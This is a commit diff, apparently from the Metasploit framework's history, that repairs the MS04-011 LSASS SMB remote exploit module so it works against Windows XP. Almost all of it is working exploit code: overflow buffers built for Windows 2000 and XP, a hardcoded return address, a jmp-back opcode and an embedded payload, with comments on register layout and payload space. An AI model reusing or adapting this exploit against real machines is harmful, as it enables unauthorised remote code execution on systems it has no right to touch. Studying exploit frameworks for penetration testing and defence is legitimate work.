This fixes #44. The XP string was missing NDR encoding and null termination.
git-svn-id: file:///home/svn/framework3/trunk@4511 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
851328fbae
commit
db198485a4
|
@ -97,8 +97,9 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
|
||||||
|
|
||||||
# Check the remote OS name and version
|
# Check the remote OS name and version
|
||||||
os = smb_peer_os
|
os = smb_peer_os
|
||||||
string = ''
|
buff = ''
|
||||||
case os
|
case os
|
||||||
|
|
||||||
# Windows 2000 requires that the string be unicode formatted
|
# Windows 2000 requires that the string be unicode formatted
|
||||||
# and give us a nice set of registers which point back to
|
# and give us a nice set of registers which point back to
|
||||||
# the un-unicoded data. We simply return to a nop sled that
|
# the un-unicoded data. We simply return to a nop sled that
|
||||||
|
@ -108,7 +109,8 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
|
||||||
str = rand_text_alphanumeric(3500)
|
str = rand_text_alphanumeric(3500)
|
||||||
str[2020, 4] = [targets[1]['Rets'][0]].pack('V')
|
str[2020, 4] = [targets[1]['Rets'][0]].pack('V')
|
||||||
str[2104, payload.encoded.length ] = payload.encoded
|
str[2104, payload.encoded.length ] = payload.encoded
|
||||||
string = NDR.UnicodeConformantVaryingString(str)
|
buff = NDR.UnicodeConformantVaryingString(str)
|
||||||
|
|
||||||
# Windows XP is a bit different, we need to use an ascii
|
# Windows XP is a bit different, we need to use an ascii
|
||||||
# buffer and a jmp esp. The esp register points to an
|
# buffer and a jmp esp. The esp register points to an
|
||||||
# eight byte segment at the end of our buffer in memory,
|
# eight byte segment at the end of our buffer in memory,
|
||||||
|
@ -116,17 +118,20 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
|
||||||
# buffer, giving us about 1936 bytes of space for a
|
# buffer, giving us about 1936 bytes of space for a
|
||||||
# payload.
|
# payload.
|
||||||
when /Windows 5\.1/
|
when /Windows 5\.1/
|
||||||
str = rand_text_alphanumeric(7000)
|
str = rand_text_alphanumeric(7000) + "\x00\x00"
|
||||||
str[0, payload.encoded.length ] = payload.encoded
|
str[0, payload.encoded.length ] = payload.encoded
|
||||||
str[1964, 4] = [targets[2]['Rets'][0]].pack('V')
|
str[1964, 4] = [targets[2]['Rets'][0]].pack('V')
|
||||||
str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload
|
str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload
|
||||||
string = str
|
str[6998, 2] = "\x00\x00"
|
||||||
|
buff = NDR.UnicodeConformantVaryingStringPreBuilt(str)
|
||||||
|
|
||||||
|
# Unsupported target
|
||||||
else
|
else
|
||||||
print_status("No target is available for #{ os }")
|
print_status("No target is available for #{ os }")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
stub = string +
|
stub = buff +
|
||||||
NDR.long(rand(0xFFFFFF)) +
|
NDR.long(rand(0xFFFFFF)) +
|
||||||
NDR.UnicodeConformantVaryingString('') +
|
NDR.UnicodeConformantVaryingString('') +
|
||||||
NDR.UnicodeConformantVaryingString('') +
|
NDR.UnicodeConformantVaryingString('') +
|
||||||
|
|
Loading…
Reference in New Issue